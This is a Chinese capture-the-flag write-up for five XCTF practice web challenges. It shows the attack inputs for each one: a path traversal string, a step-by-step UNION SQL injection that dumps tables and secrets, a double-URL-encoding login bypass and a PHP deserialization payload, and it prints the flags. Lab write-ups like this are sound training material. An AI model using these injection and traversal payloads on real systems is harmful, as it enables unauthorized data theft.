攻防世界web进阶区 6-10题 write up

文章目录

    • warmup
    • NewsCenter
    • NaNNaNNaNNaN-Batman
    • PHP2
    • unserialize3

warmup

打开是一个大笑脸,F12查看源码,有提示
攻防世界web进阶区 6-10题 write up_第1张图片
接着访问source.php
攻防世界web进阶区 6-10题 write up_第2张图片
再次得到提示hint.php, 然后访问hint.php, 得到

攻防世界web进阶区 6-10题 write up_第3张图片
构造:source.php?file=hint.php?./…/…/…/…/ffffllllaaaagggg
访问在页面底部得到flag
攻防世界web进阶区 6-10题 write up_第4张图片
flag{25e7bce6005c4e0c983fb97297ac6e5a}

 

NewsCenter

进去是一个搜索框,输入1,返回不正常注释掉1,又正常了,判定存在sql注入。之后用order by查询有三个字段。
输入:1‘ union selecct 1,2,3# 爆出字段的位置
攻防世界web进阶区 6-10题 write up_第5张图片
输入:1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() # 爆出表名
攻防世界web进阶区 6-10题 write up_第6张图片
输入:1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=“secret_table” #爆出字段

攻防世界web进阶区 6-10题 write up_第7张图片
输入:1’ union select 1,2,group_concat(fl4g) from secret_table #爆出flag
攻防世界web进阶区 6-10题 write up_第8张图片
flag:QCTF{sq1_inJec7ion_ezzz}
 

NaNNaNNaNNaN-Batman

下载文件之后打开,内容如下:
攻防世界web进阶区 6-10题 write up_第9张图片
将最后的eval改为alert,保存,再用浏览器打开,会弹出一个弹框
攻防世界web进阶区 6-10题 write up_第10张图片
将弹框中的代码整理得到
攻防世界web进阶区 6-10题 write up_第11张图片
阅读代码可知,只要满足条件if满足,就能够得到flag

然后再把下载的源文件(把alert改为原来的eval)用浏览器打开,会出现以下弹框
攻防世界web进阶区 6-10题 write up_第12张图片
在弹框中输入满足的条件be0f233ac7be98aa,就可以直接得到flag
在这里插入图片描述
flag{it’s_a_h0le_in_0ne}
 

PHP2

打开网址,出现以下这句话
Can you anthenticate to this website?
然后访问index.phps文件,出现下面代码
攻防世界web进阶区 6-10题 write up_第13张图片
当id传入时,会对不是ASCII码的字符运行urlencode,之后代码运行时,会再一次运行一次urlencode,进行解码。而且输入admin才能得到flag,但是直接输入admin却不会直接得到flag,所以用urlencode进行转换。
构造:id=%2561%2564dmin(admin中的任何一个或者多个字母写成urlencode编码格式构建都可以)
攻防世界web进阶区 6-10题 write up_第14张图片
cyberpeace{f4a9162e1edbc57ba8bf5da647f0f623}
 

unserialize3

打开网址,如下所示:
攻防世界web进阶区 6-10题 write up_第15张图片
代码审计:构造?code=O:4:“xctf”:2:{s:4:“flag”;s:3:“111”;}
攻防世界web进阶区 6-10题 write up_第16张图片
flag:cyberpeace{ac2b7cb35c5831b2710cce6dec99f723}
 

做题参考:https://www.cnblogs.com/joker-vip

你可能感兴趣的:(CTF习题write,up)